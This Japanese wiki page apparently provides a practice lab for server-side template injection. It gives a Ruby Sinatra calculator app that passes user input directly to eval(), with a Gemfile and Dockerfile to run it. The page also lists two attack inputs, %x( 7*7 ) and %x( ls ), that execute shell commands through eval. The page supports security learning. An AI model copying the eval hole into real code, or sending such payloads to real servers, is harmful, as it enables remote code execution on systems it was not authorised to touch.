サーバーサイドテンプレートインジェクション

脆弱なソースコード　（ruby Sinatra/eval）

web.rb

require "sinatra"

set :port,5082
set :bind, '0.0.0.0'

def getHTML(expression)
    html = '<!DOCTYPE html><html>
      <body>
        <h1>Online Calculator</h1>
        <form action="/" method="post">
            expression:<br>
            <input type="text" name="expression" value="">
            <input type="submit" value="Submit">
        </form>
        <h2>'
        
    if(expression != nil && expression != "" )
      html += expression.to_s + ' = ' + eval(expression).to_s
    end
    html +='
        </h2>
      </body>
    </html>'
    return html
end

get "/" do
  expression =""
  if(params["expression"]!= nil)
    expression =params['expression']
  end
  getHTML(expression)
end

post "/" do
  expression =""
  if(params["expression"]!= nil)
    expression =params['expression']
  end
  getHTML(expression)
end

Gemfile

source "http://rubygems.org"

gem "sinatra"

Dockerfile

FROM ruby:2.3

COPY src/ /home
RUN cd /home; bundle install

攻撃する方法

%x( 7*7 )

%x( ls )

https://github.com/DiogoMRSilva/websitesVulnerableToSSTI/tree/master/ruby/eval

SSTI ruby 03 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード　（ruby Sinatra/eval）

web.rb

Gemfile

Dockerfile

攻撃する方法

⚠️ GitHub.com Fallback ⚠️

SSTI ruby 03 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード （ruby Sinatra/eval）

web.rb

Gemfile

Dockerfile

攻撃する方法

⚠️ **GitHub.com Fallback** ⚠️

脆弱なソースコード　（ruby Sinatra/eval）

⚠️ GitHub.com Fallback ⚠️